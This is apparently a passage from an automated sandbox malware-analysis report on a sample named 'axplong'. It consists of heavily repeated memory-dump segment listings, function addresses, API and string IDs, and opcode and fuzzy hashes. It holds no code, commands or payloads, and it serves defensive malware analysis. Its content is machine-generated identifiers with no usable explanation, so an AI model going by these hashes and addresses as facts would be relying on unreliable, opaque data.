                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768969984.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768984610.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769000531.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769015221.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769031612.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769047938.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769108637.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769123572.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769136569.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769151732.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769164889.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769179945.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769193334.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ___std_exception_copy
                                                                                                                                                                                                                                                    • String ID: P#g$P#g
                                                                                                                                                                                                                                                    • API String ID: 2659868963-973111119
                                                                                                                                                                                                                                                    • Opcode ID: 1e7d957ad10b5acbfd39a41f57cb82c0b25e37ce2d2c3f2959df5776f03d861b
                                                                                                                                                                                                                                                    • Instruction ID: 93e458a0b923a3cfbacd3b7dbc29156294a95a306b00935fb3048ee791e11242
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1e7d957ad10b5acbfd39a41f57cb82c0b25e37ce2d2c3f2959df5776f03d861b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4071A0B1D0161A9FDB24EF55D885799BBF6FF18310F24862AE805EB790D7709940CFA0
                                                                                                                                                                                                                                                    Function 00688E70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 197COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768318896.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768336160.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768392135.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768407032.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768422851.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768436667.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768456368.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768563441.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768578614.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768639700.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768654389.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768672961.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768687224.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768701857.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768716608.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768730939.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768746480.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768765033.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768779649.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768793213.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768807399.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768823367.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768845576.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768859098.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768874341.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768891184.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768905837.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768921386.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768969984.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768984610.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769000531.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769015221.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769031612.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769047938.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769108637.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769123572.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769136569.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769151732.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769164889.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769179945.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769193334.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: P#g$P#g
                                                                                                                                                                                                                                                    • API String ID: 0-973111119
                                                                                                                                                                                                                                                    • Opcode ID: 843c0f4dc5b15d98259f090899cf211f35870ebc43b86766e1c13f18f733397e
                                                                                                                                                                                                                                                    • Instruction ID: f462ef4b1829c1e19f0fa50b8e3c66ed152e467839b5e8511d0583e019c45005
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 843c0f4dc5b15d98259f090899cf211f35870ebc43b86766e1c13f18f733397e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 19511572A001199FCB14FFA8DC419AEB7ABEF45340B54066DF905EB341EB30EE118BA5
                                                                                                                                                                                                                                                    Function 0067DAF0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 189COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768318896.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768336160.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768392135.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768407032.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768422851.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768436667.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768456368.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768563441.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768578614.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768639700.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768654389.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768672961.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768687224.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768701857.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768716608.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768730939.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768746480.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768765033.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768779649.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768793213.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768807399.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768823367.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768845576.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768859098.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768874341.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768891184.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768905837.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768921386.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768969984.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768984610.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769000531.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769015221.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769031612.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769047938.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769108637.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769123572.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769136569.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769151732.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769164889.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769179945.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769193334.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: 7oq<$list too long
                                                                                                                                                                                                                                                    • API String ID: 0-542538162
                                                                                                                                                                                                                                                    • Opcode ID: 4cc9dfd46eef6c46a76f2bab1fa176c39ceb3bcd4eb1054fc020e7d8ff820e1d
                                                                                                                                                                                                                                                    • Instruction ID: 18caddb1b4574a4d80563aa2fac135912989dfb27eb4c25a7c8ac3f4ac2cb108
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4cc9dfd46eef6c46a76f2bab1fa176c39ceb3bcd4eb1054fc020e7d8ff820e1d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB61B5B0D047199BDB50EF64CC49B99F7B5EF14310F0086AAE90DA7381EB70AA84CF65
                                                                                                                                                                                                                                                    Function 006A6E01 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 145COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 006A6F12
                                                                                                                                                                                                                                                      • Part of subcall function 006A7177: __dosmaperr.LIBCMT ref: 006A71AC
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768318896.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768336160.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768392135.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768407032.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768422851.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768436667.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768456368.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768563441.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768578614.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768639700.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768654389.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768672961.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768687224.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768701857.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768716608.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768730939.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768746480.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768765033.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768779649.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768793213.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768807399.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768823367.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768845576.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768859098.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768874341.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768891184.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768905837.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768921386.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768969984.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768984610.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769000531.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769015221.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769031612.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769047938.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769108637.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769123572.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769136569.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769151732.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769164889.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769179945.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769193334.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __dosmaperr
                                                                                                                                                                                                                                                    • String ID: 3mj$7oq<
                                                                                                                                                                                                                                                    • API String ID: 2332233096-773028639
                                                                                                                                                                                                                                                    • Opcode ID: 2af05ac60800973ccc227dabd116c7cf2658a776c285010af0d4404195bb8f07
                                                                                                                                                                                                                                                    • Instruction ID: f75e8616b1496474672af3e3245771ee385271e13ef3cd67de753cbc0da6e045
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2af05ac60800973ccc227dabd116c7cf2658a776c285010af0d4404195bb8f07
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0413CB5900644AFDB24EFB5EC459ABB7FAEF8A300B14452EF556D3610EA30AD04CF61
                                                                                                                                                                                                                                                    Function 00673290 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 142COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768318896.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768336160.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768392135.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768407032.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768422851.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768436667.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768456368.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768563441.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768578614.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768639700.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768654389.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768672961.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768687224.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768701857.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768716608.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768730939.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768746480.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768765033.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768779649.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768793213.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768807399.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768823367.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768845576.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768859098.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768874341.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768891184.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
